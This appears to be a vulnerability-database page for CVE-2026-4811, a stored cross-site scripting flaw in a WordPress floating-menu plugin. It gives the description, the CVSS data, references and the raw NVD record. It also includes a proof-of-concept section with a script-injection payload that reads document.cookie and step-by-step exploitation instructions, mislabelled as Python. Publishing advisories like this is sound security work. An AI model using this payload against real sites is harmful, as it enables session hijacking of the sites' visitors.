CVE-2026-4811

Description

The WPB Floating Menu & Categories for WordPress – Sticky Side Menu with Icons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Icon CSS Class' category field in all versions up to, and including, 1.0.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Editor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score

4.9

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WPB Floating Menu & Categories for WordPress <= 1.0.8

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// PoC Payload for CVE-2026-4811
// Target Field: 'Icon CSS Class' in Category Settings

// The payload attempts to break out of the attribute context and inject a script tag.
// Assuming the output looks like: <div class="[USER_INPUT]">

const payload = '"><script>alert(document.cookie)</script>';

/*
Exploitation Steps:
1. Log in to WordPress as a user with 'Editor' role or higher.
2. Navigate to WPB Floating Menu > Categories.
3. Click 'Add New' or edit an existing category.
4. Insert the payload into the 'Icon CSS Class' input field.
5. Click 'Save'.
6. Visit any frontend page that renders this menu.
7. The JavaScript alert will trigger, demonstrating the Stored XSS.
*/

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4811
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4811
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4811/
[4] VulDB https://vuldb.com/cve/CVE-2026-4811
[5] https://plugins.trac.wordpress.org/browser/wpb-floating-menu-or-categories/tags/1.0.8/admin/category-icon.php#L41
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/961702ff-60fb-41ff-99b0-a37ade051083?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4811", "sourceIdentifier": "[email protected]", "published": "2026-05-21T04:16:31.133", "lastModified": "2026-05-21T15:19:30.540", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WPB Floating Menu & Categories for WordPress – Sticky Side Menu with Icons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Icon CSS Class' category field in all versions up to, and including, 1.0.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Editor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wpb-floating-menu-or-categories/tags/1.0.8/admin/category-icon.php#L41", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/961702ff-60fb-41ff-99b0-a37ade051083?source=cve", "source": "[email protected]"}]}}